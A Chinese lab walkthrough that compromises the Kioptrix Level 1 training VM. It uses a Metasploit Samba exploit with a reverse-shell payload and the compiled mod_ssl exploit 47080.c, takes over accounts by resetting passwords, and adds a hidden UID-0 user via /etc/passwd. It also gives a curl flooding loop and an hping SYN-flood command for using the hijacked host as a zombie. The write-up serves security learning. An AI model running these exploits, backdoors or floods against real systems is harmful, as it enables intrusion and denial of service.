目录
注:以下内容仅供学习交流,请勿用于非法途径
攻击机
kali
靶机
Kioptrix_Level_1
链接: https://pan.baidu.com/s/1mKgDej801fuFzBdD8U7IXA?pwd=4tmr 提取码: 4tmr
确定IP
先扫了一下局域网确定一下IP地址,可以通过过MAC地址来确定
扫端口
nmap 192.168.1.105 -p- -sV -sS -T4 -A
-p- :扫描全部端口
-sV : 扫描服务版本
-sS : TCP SYN扫描
-T4 : 扫描时序,数字越大,速度越快
-A : 综合扫描
Samba
Samba是在Linux和UNIX系统上实现SMB协议的一个免费软件,由服务器及客户端程序构成。SMB(Server Messages Block,信息服务块)是一种在局域网上共享文件和打印机的一种通信协议,它为局域网内的不同计算机之间提供文件及打印机等资源的共享服务。SMB协议是客户机/服务器型协议,客户机通过该协议可以访问服务器上的共享文件系统、打印机及其他资源。通过设置“NetBIOS over TCP/IP”使得Samba不但能与局域网络主机分享资源,还能与全世界的电脑分享资源。(摘自百度百科)
使用SMB协议主要用到139和445端口
扫一下SMB漏洞
1、enum4linux:SMB枚举工具(利用空会话认证,收集靶机信息)
enum4linux 192.168.1.105
发现没有空会话漏洞,所以我们换个思路
-
使用searchsploit查询一下SMB服务漏洞
发现一堆
由于我们现在还不知道它使用的版本,所以除了一个个试的最后方法外,我们还可以用到一个工具来扫描它的SMB版本信息,MSF(美少妇)
利用查询版本模块
search smb_version
使用这一模块并进行设置
找到了版本号
所以我们可以使用精准查询
search samba 2.2
我们使用Linux那个的,使用并设置
发现进不去,可能这个靶机版本太老了,我们改一下攻击载荷试试
set payload linux/x86/shell_reverse_tcp
这个是反向shell链接,没有用到MSF攻击载荷模块
这次成功进入
发现我们是root权限
但是我们发现虽然我们是root权限,但是好像很多东西都被限制了
提权
这里用到的方法是添加一个root权限用户,也就是0 0
添加一个用户试试
useradd xiaoming
很不辛的是,我们的权限太低了,连添加账户都做不到,这时候我们又要找一个新的思路,既然我们的权限那么小,那能不能尝试使用那些高权限的用户的
我们可以先用w看看有没有什么用户在线,不过发现没有用户在线
既然如此,我们尝试修改一个其他账户john的密码,毕竟我们是root权限
诶,结果发现还真的可以
我们前面知道它也开了ssh端口,所以我们用xshell进去一下
输入刚刚设置的密码123456
成功进入
但是发现这个账户还是没有权限
没办法,再换一个试试,毕竟这东西本身就是在不断的试错中得到正确答案,这也是渗透的魅力之一
这次我们来个狠的,直接试一下root这个账户
这次发现成功进来了,不过为了隐蔽性我们创建一个暂时是普通用户的用户,xiaoming
好了,现在我们正式进行提权
进入vim /etc/passwd修改成00即可
我们登录一下看看,成功进入,而且没有权限限制
进来后我们可以利用这台肉鸡进行肉鸡流量污染,当然了这里不能讲,我们这里做个小测试就行。
这里我们使用我们的kali作为靶机
kali查看一下流量
watch -n 1 "sar -n DEV 1 2"
IFACE: LAN接口
rxpck/s : 每秒中接收的数据包
txpck/s : 每秒中发送的数据包
rxbyt/s : 每秒中接收的字节数
txbyt/s : 每秒中发送的字节数
可以写个脚本
for ((i=1;i<=$1;i++));
do
curl http://192.168.1.106
done
、
运行一下
sh wr.sh 1000000
发现kali这边瞬间就起飞了,不过由于虚拟机是无限带宽的,所以感觉不是很明显
或者我们可以用来利用洪水攻击
hping -c 100000 -n -i u1 -S -d 2000000 192.168.1.106
具体效果就不在这里演示了
mod_ssl
渗透的方式有很多种,除了刚刚说的samba,我们也可以利用这个漏洞看看能不能进去
搜一下相关漏洞
serachsploit mod_ssl
这里有好几个,我们可以一个一个地试一试,不过我们这里为了节省时间,我们直接使用这个试过后可行的
searchsploit -m 47080.c
编译一下这个漏洞文件
gcc -o mod_ssl_exp 47080.c -lcrypto
查看漏洞帮助
./mod_ssl_exp -h
这里需要指定target,之前我们发现是redhat机器,所以在target中选择redhat即可,挨个尝试可找到0x6b时可反弹shell
./mod_ssl_exp 0x6b 192.168.1.105 443 -c 50
进入后的提权操作可以自行尝试
当然了, 除了这里两种,或许我们也可以通过他的80端口进行渗透,这些就需要大家自行尝试了。